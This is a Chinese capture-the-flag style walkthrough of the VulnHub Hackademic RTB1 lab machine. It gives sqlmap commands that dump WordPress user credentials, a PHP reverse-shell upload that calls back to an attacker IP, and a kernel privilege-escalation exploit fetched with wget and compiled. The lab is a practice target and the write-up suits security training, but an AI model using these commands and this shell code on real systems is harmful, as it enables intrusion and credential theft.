HACKADEMIC: RTB1靶场-复现

admin 2024年4月26日10:17:54评论2 views字数 1292阅读4分18秒阅读模式

靶机介绍

官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17

靶机目标

获取root目录里key.txt

运行环境:
虚拟机网络设置的是NAT模式
靶机:IP地址:192.168.110.235
攻击机:kali linux,IP地址:192.168.233.236

信息收集

获取靶机IP地址

HACKADEMIC: RTB1靶场-复现

查看靶机开放端口号

HACKADEMIC: RTB1靶场-复现

进入靶机

HACKADEMIC: RTB1靶场-复现

扫描敏感目录

nikto -h http://192.168.110.235dirb http://192.168.110.235/Hackademic_RTB1/gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.110.235

HACKADEMIC: RTB1靶场-复现

HACKADEMIC: RTB1靶场-复现

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

HACKADEMIC: RTB1靶场-复现

sqlmap跑一下

sqlmap -u http://192.168.110.235/Hackademic_RTB1/?cat=1 --dbs --batch

HACKADEMIC: RTB1靶场-复现

HACKADEMIC: RTB1靶场-复现

sqlmap -u http://192.168.110.235/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

HACKADEMIC: RTB1靶场-复现

HACKADEMIC: RTB1靶场-复现

sqlmap -u http://192.168.110.235/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

HACKADEMIC: RTB1靶场-复现

sqlmap -u http://192.168.110.235/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

HACKADEMIC: RTB1靶场-复现

GeorgeMiller、q1w2e3登录

HACKADEMIC: RTB1靶场-复现

HACKADEMIC: RTB1靶场-复现

getshell

shell.php

<div><?php$sock = fsockopen('192.168.233.129','8888');$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);proc_close($process);?></div>

上传shell

HACKADEMIC: RTB1靶场-复现

HACKADEMIC: RTB1靶场-复现

运行反弹shell

HACKADEMIC: RTB1靶场-复现

反弹shell成功

HACKADEMIC: RTB1靶场-复现

提权

  1. 尝试sudo提权,但无权限

  1. 查看linxu内核版本2.6.31.5,尝试内核提权

HACKADEMIC: RTB1靶场-复现

  1. kali搜索可利用代码

searchsploit2.6.3

经测试15285.c可用

HACKADEMIC: RTB1靶场-复现HACKADEMIC: RTB1靶场-复现

下载到本地searchsploit -m 15285.c

kali开启web服务器

HACKADEMIC: RTB1靶场-复现

在靶机中下载

wget http://192.168.110.236/15285.c

HACKADEMIC: RTB1靶场-复现

编译脚本

gcc 15285.c -o exp

将编译的exp赋予执行权限并执行exp

HACKADEMIC: RTB1靶场-复现

成功到root

原文始发于微信公众号(网络安全学习爱好者):HACKADEMIC: RTB1靶场-复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月26日10:17:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HACKADEMIC: RTB1靶场-复现https://cn-sec.com/archives/2081018.html

发表评论

匿名网友 填写信息